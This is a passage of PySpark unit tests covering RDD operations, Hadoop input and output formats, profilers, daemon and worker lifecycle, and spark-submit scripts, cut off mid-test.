def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
def test_narrow_dependency_in_join(self):
rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
parted = rdd.partitionBy(2)
self.assertEqual(2, parted.union(parted).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
tracker = self.sc.statusTracker()
self.sc.setJobGroup("test1", "test", True)
d = sorted(parted.join(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test1")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test2", "test", True)
d = sorted(parted.join(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test2")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test3", "test", True)
d = sorted(parted.cogroup(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test3")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test4", "test", True)
d = sorted(parted.cogroup(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test4")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('cc').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
old_stdout = sys.stdout
sys.stdout = io = StringIO()
self.sc.show_profiles()
self.assertTrue("heavy_foo" in io.getvalue())
sys.stdout = old_stdout
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 18):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
for v in maps:
self.assertTrue(v in em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = b"short binary data"
with open(os.path.join(path, "part-0000"), 'wb') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
self.assertTrue(v, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
self.assertTrue(v, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
self.assertTrue(v, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
@unittest.skipIf(sys.version >= "3", "serialize of array")
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = list(zip(x, y))
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send(b"\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
python_exec = sys.executable or os.environ.get("PYSPARK_PYTHON")
daemon = Popen([python_exec, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content, dir=None):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name)
else:
os.makedirs(os.path.join(self.programDir, dir))
path = os.path.join(self.programDir, dir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name + ext)
else:
path = os.path.join(self.programDir, dir, zip_name + ext)
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def create_spark_package(self, artifact_name):
group_id, artifact_id, version = artifact_name.split(":")
self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
|<?xml version="1.0" encoding="UTF-8"?>
|<project xmlns="http://maven.apache.org/POM/4.0.0"
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
| http://maven.apache.org/xsd/maven-4.0.0.xsd">
| <modelVersion>4.0.0</modelVersion>
| <groupId>%s</groupId>
| <artifactId>%s</artifactId>
| <version>%s</version>
|</project>
""" % (group_id, artifact_id, version)).lstrip(),
os.path.join(group_id, artifact_id, version))
self.createFileInZip("%s.py" % artifact_id, """
|def myfunc(x):
| return x + 1
""", ".jar", os.path.join(group_id, artifact_id, version),
"%s-%s" % (artifact_id, version))
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
